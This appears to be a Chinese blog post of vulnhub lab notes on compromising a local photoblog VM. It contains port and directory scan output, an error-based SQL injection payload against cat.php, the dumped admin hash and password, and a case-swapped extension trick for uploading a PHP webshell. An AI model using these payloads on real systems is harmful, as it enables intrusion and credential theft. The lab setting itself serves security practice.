2. 技术
    3. vulnhub笔记:from

    vulnhub笔记:from

    技术2024-07-13  72

    信息收集

    端口扫描

    # nmap -p- -sC -sV 192.168.111.141 -oA scans/allport Nmap scan report for 192.168.111.141 Host is up (0.00043s latency). Not shown: 65533 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 5.5p1 Debian 6+squeeze2 (protocol 2.0) | ssh-hostkey: | 1024 f8:4a:f0:61:f1:00:51:74:35:6b:2d:48:97:47:1c:84 (DSA) |_ 2048 e3:91:77:99:64:b6:cd:45:71:d1:6c:55:42:c6:43:55 (RSA) 80/tcp open http Apache httpd 2.2.16 ((Debian)) |_http-server-header: Apache/2.2.16 (Debian) |_http-title: My Photoblog - last picture MAC Address: 00:0C:29:3C:74:CE (VMware) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

    目录爆破

    # dirb http://192.168.111.141 ----------------- DIRB v2.22 By The Dark Raver ----------------- START_TIME: Fri Jul 3 20:50:38 2020 URL_BASE: http://192.168.111.141/ WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt ----------------- GENERATED WORDS: 4612 ---- Scanning URL: http://192.168.111.141/ ---- ==> DIRECTORY: http://192.168.111.141/admin/ + http://192.168.111.141/all (CODE:200|SIZE:2022) + http://192.168.111.141/cat (CODE:200|SIZE:1858) + http://192.168.111.141/cgi-bin/ (CODE:403|SIZE:291) ==> DIRECTORY: http://192.168.111.141/classes/ ==> DIRECTORY: http://192.168.111.141/css/ + http://192.168.111.141/footer (CODE:200|SIZE:185) + http://192.168.111.141/header (CODE:200|SIZE:796) ==> DIRECTORY: http://192.168.111.141/images/ + http://192.168.111.141/index (CODE:200|SIZE:1343) + http://192.168.111.141/index.php (CODE:200|SIZE:1343) + http://192.168.111.141/server-status (CODE:403|SIZE:296) + http://192.168.111.141/show (CODE:200|SIZE:1320) ---- Entering directory: http://192.168.111.141/admin/ ---- + http://192.168.111.141/admin/del (CODE:302|SIZE:0) + http://192.168.111.141/admin/footer (CODE:200|SIZE:19) + http://192.168.111.141/admin/header (CODE:200|SIZE:686) + http://192.168.111.141/admin/index (CODE:302|SIZE:0) + http://192.168.111.141/admin/index.php (CODE:302|SIZE:0) + http://192.168.111.141/admin/login (CODE:200|SIZE:1387) + http://192.168.111.141/admin/logout (CODE:302|SIZE:0) + http://192.168.111.141/admin/new (CODE:302|SIZE:0) ==> DIRECTORY: http://192.168.111.141/admin/uploads/ ---- Entering directory: http://192.168.111.141/classes/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://192.168.111.141/css/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://192.168.111.141/images/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://192.168.111.141/admin/uploads/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway)

    发现一个目录遍历的问题,

    前台sql注入

    到处点点,发现一个sql注入,可以用报错注入

    访问/cat.php?id=1 AND (EXTRACTVALUE(1,CONCAT(0x7C,@@basedir,0x7C))) XPATH syntax error: '|/usr/|'

    也可以用联合注入 列数为4,第二位有回显。已经可以用sqlmap一把梭, 也可以手工注熟悉下命令.

    拿到管理员密码

    Database: photoblog Table: users [1 entry] +------+-------+---------------------------------------------+ | id | login | password | +------+-------+---------------------------------------------+ | 1 | admin | 8efe310f9ab3efeae8d410a8e0166eb2 (P4ssw0rd) | +------+-------+---------------------------------------------+

    后台文件上传

    登录后台,上传内容为php马的图片,用burp改后缀为Php(大小写绕过) 直接上AntSword拿到shell

    Processed: 0.012, SQL: 10